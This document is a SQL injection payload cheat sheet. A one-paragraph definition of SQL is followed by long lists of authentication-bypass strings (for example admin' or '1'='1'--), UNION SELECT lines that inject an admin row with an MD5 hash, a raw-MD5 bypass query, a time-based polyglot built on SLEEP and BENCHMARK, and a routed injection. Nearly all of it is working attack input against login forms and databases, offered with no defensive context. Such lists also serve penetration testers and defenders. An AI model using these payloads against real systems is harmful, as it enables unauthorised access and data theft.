What Is SQL? 
SQL is short for Structured Query Language. Its chief function is managing structured data 
on a relational database management system (RDBMS), usually arranged in tables. SQL is 
case-insensitive, but it’s common to capitalize SQL keywords such as SELECT and FROM. 


                            Authentication bypass
 '-' 
' ' 
'&' 
'^' 
'*' 
' or 1=1 limit 1 -- -+ 
'="or' 
' or ''-' 
' or '' ' 
' or ''&' 
' or ''^' 
' or ''*' 
'-||0' 
"-||0" 
"-" 
" " 
"&" 
"^" 
"*" 
'--' 
"--" 
'--' / "--" 
" or ""-" 
" or "" " 
" or ""&" 
" or ""^"
 " or ""*" 
or true-- 
" or true-- 
' or true-- 
") or true-- 
') or true-- 
' or 'x'='x 
') or ('x')=('x 
')) or (('x'))=(('x 
" or "x"="x 
") or ("x")=("x 
")) or (("x"))=(("x 
or 2 like 2 
or 1=1 
or 1=1-- 
or 1=1# 
or 1=1/* 
admin' -- 
admin' -- - 
admin' # 
admin'/* 
admin' or '2' LIKE '1 
admin' or 2 LIKE 2-- 
admin' or 2 LIKE 2# 
admin') or 2 LIKE 2# 
admin') or 2 LIKE 2-- 
admin') or ('2' LIKE '2 
admin') or ('2' LIKE '2'# 
admin') or ('2' LIKE '2'/* 
admin' or '1'='1 
admin' or '1'='1'-- 
admin' or '1'='1'# 
admin' or '1'='1' 
admin'or 1=1 or ''=' 
admin' or 1=1 
admin' or 1=1-- 
admin' or 1=1# 
admin' or 1=1 
admin') or ('1'='1 
admin') or ('1'='1'-- 
admin') or ('1'='1'# 
admin') or ('1'='1' 
admin') or '1'='1 
admin') or '1'='1'-- 
admin') or '1'='1'# 
admin') or '1'='1' 
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 
admin" -- 
admin';-- azer  
admin" # 
admin"/* 
admin" or "1"="1 
admin" or "1"="1"-- 
admin" or "1"="1"#
admin" or "1"="1"/* 
admin"or 1=1 or ""=" 
admin" or 1=1 
admin" or 1=1-- 
admin" or 1=1# 
admin" or 1=1/* 
admin") or ("1"="1 
admin") or ("1"="1"-- 
admin") or ("1"="1"# 
admin") or ("1"="1"/* 
admin") or "1"="1 
admin") or "1"="1"-- 
admin") or "1"="1"# 
admin") or "1"="1"/* 
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 





Authentication Bypass (Raw MD5 SHA1)
 "SELECT * FROM admin WHERE pass = '".md5($password,true)."'"

Polyglot injection (multicontext)
 
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/ 
7/17/2023
 /* MySQL only */ 
IF(SUBSTR(@@version,1,1)
 <5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)
 <5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1
 )<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/


 Routed injection
 admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'


